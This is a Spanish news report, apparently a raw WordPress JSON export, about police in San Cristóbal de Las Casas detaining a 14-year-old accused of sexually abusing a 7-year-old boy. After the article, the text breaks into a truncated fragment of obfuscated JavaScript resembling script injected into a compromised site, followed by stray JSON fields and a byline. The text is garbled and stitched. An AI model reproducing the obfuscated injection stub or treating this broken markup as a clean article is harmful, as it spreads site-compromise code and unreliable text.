San Crist\u00f3bal de Las Casas.- Por su presunta responsabilidad en el delito de abuso sexual de un menor de 7 a\u00f1os en el Barrio La Garita, elementos de la Polic\u00eda Municipal lograron la detenci\u00f3n y puesta a disposici\u00f3n de un adolescente de 14 a\u00f1os, de identidad resguardada.<\/p>\n\n\n\n<p>Los hechos se registraron alrededor de las 22:30 horas de este jueves, donde la mam\u00e1 de la v\u00edctima se percat\u00f3 que el imputado estaba agrediendo sexualmente a su menor hijo, por lo que de inmediato solicit\u00f3 el apoyo de la Polic\u00eda Municipal.<\/p>\n\n\n\n<p>Por los hechos ocurridos, los elementos municipales trasladaron al menor de 14 a\u00f1os a la Fiscal\u00eda de Adolescentes, ubicada en la ciudad de Tuxtla Guti\u00e9rrez, junto con la mam\u00e1 de la v\u00edctima, a fin de que \u00e9sta representaci\u00f3n social determine su situaci\u00f3n jur\u00eddica.<br><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal26 de abril del 2024.
